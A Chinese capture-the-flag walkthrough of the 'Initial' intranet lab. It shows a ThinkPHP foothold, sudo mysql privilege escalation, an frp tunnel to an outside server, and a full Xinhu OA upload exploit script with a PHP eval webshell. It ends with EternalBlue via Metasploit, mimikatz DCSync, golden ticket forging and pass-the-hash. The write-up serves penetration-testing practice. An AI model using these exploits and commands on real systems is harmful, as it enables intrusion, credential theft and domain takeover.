目录

简介

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

flag1

外网打点

fscan64.exe -h  39.99.149.147

image-20230802225625045

扫描出80端口和22端口,指纹识别出thinkphp框架

用工具getshell

image-20230802225724832

image-20230802225746448

getshell成功

image-20230802225846222

权限只有www-data

sudo提权

sudo -l

image-20230802225928263

发现mysql可以有root权限,且免密

查找flag

sudo mysql -e '\! find / -name flag*'

image-20230802230149763

找到flag01.txt

sudo mysql -e '\! cat /root/flag/flag01.txt'

image-20230802230248480

flag{60b53231-

flag2

内网扫描

查看网卡

image-20230802230424295

发现内网网段 172.22.1.0/24

上传fscan工具进行扫描,可以放在tmp目录下,结果在result.txt中

image-20230802230928643

cp fscan_386 /tmp
chmod +x fscan_386
./fscan_386 -h 172.22.1.0/24

image-20230802231718615

从中我们可以知道我们的目标

172.22.1.2:DC域控 172.22.1.21:Windows的机器并且存在MS17-010 漏洞 172.22.1.18:信呼OA办公系统

先打信呼OA

利用frp进行代理

靶机上

frpc.ini

[common]
server_addr = 49.233.121.53
server_port = 6890

[plugin_socks5]
type = tcp
remote_port = 5001
plugin = socks5

chmod +x frpc
./frpc -c frpc.ini

自己服务器上

[common]
bind_port = 6890

chmod +x frps
./frps -c frps.ini

image-20230802233147465

配好代理可以直接访问

image-20230802233222975

弱密码

admin admin123直接登录

漏洞利用参考:https://blog.csdn.net/solitudi/article/details/118675321

exp.py:

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

同目录下再放一个1.php

image-20230802234041031

<?php eval($_POST[1]);?>

image-20230802234029110

image-20230802234829327

把蚁剑也设置到代理里面就可以直接连接了,但是有点不稳定

image-20230802235100762

image-20230802235447365

拿到第二部分的flag

2ce3-4813-87d4-

flag3

ms17-010利用

image-20230803001249442

设置代理,然后用msf

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

image-20230803002228805

打的时候把其它代理都关了,不然网太差,打不成功

横向移动

利用DCSync

load kiwi

导出域内所有用户Hash

`kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv`

image-20230803002504001

生成黄金票据

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt

image-20230803002608220

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 2022/6/5 20:40:39
Object Security ID   : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
    ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
    lm  - 0: c4f45322c850c77aecb3aa71c2e44c1e

导入黄金票据

kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt

image-20230803002658374

wmiexec哈希传递

wmiexec.exe -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"

image-20230803005131888

拿到第三部分flag

e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}